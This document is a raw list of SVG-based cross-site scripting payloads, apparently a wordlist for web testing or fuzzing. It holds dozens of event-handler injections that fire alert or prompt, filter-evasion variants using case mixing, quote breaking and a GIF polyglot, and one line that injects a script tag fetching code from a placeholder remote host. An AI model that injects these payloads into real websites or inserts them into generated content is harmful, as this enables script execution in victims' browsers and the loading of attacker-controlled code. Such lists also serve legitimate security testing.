"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<svg onload=alert(1)>
"><svg onload=alert(1)//
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<svg draggable="true" ondrag="alert(1)">test</svg>
<svg draggable="true" ondragend="alert(1)">test</svg>
<svg draggable="true" ondragenter="alert(1)">test</svg>
<svg draggable="true" ondragleave="alert(1)">test</svg>
<svg draggable="true" ondragstart="alert(1)">test</svg>
<svg id=x onfocus=alert(1)>
<svg id=x onfocusin=alert(1)>
<svg id=x tabindex=1 onactivate=alert(1)></svg>
<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg>
<svg onbeforecopy="alert(1)" contenteditable>test</svg>
<svg onbeforecut="alert(1)" contenteditable>test</svg>
<svg onbeforepaste="alert(1)" contenteditable>test</svg>
<svg onclick="alert(1)">test</svg>
<svg oncontextmenu="alert(1)">test</svg>
<svg oncopy="alert(1)" contenteditable>test</svg>
<svg oncut="alert(1)" contenteditable>test</svg>
<svg ondblclick="alert(1)">test</svg>
<svg onkeydown="alert(1)" contenteditable>test</svg>
<svg onkeypress="alert(1)" contenteditable>test</svg>
<svg onkeyup="alert(1)" contenteditable>test</svg>
<svg onload=alert(1)>
<svg onmousedown="alert(1)">test</svg>
<svg onmouseenter="alert(1)">test</svg>
<svg onmouseleave="alert(1)">test</svg>
<svg onmousemove="alert(1)">test</svg>
<svg onmouseout="alert(1)">test</svg>
<svg onmouseover="alert(1)">test</svg>
<svg onmouseup="alert(1)">test</svg>
<svg onpaste="alert(1)" contenteditable>test</svg>
<svg onunload=window.open('javascript:alert(1)')>
<svg><base onload=alert(1)></base>
<svg><basefont onload=alert(1)></basefont>
<svg><bgsound onload=alert(1)></bgsound>
<svg><discard onbegin=alert(1)>
<svg><table onload=alert(1)></table>
<svg><tbody onload=alert(1)></tbody>
<svg><td onload=alert(1)></td>
<svg><template onload=alert(1)></template>
<svg><textarea onload=alert(1)></textarea>
<svg><tfoot onload=alert(1)></tfoot>
<svg><th onload=alert(1)></th>
<svg><thead onload=alert(1)></thead>
<svg><time onload=alert(1)></time>
<svg><title onload=alert(1)></title>
<svg><tr onload=alert(1)></tr>
<svg><tt onload=alert(1)></tt>
<svg><u onload=alert(1)></u>
<svg><ul onload=alert(1)></ul>
<svg><var onload=alert(1)></var>
<svg><video onload=alert(1)></video>
<svg><wbr onload=alert(1)></wbr>
<svg><xmp onload=alert(1)></xmp>
<svg><xss onload=alert(1)></xss>
<svg/onload=alert(1)
<sVg oNloaD=write()>
<svG/x=">"/oNloaD=confirm()//
<SVg </onlOad ="1> (_=prompt,_(1)) "">
<svg xmlns="http://www.w3.org/2000/svg">
<!-- injection --><svg height="50px">
<svg onload=(alert)(1)>
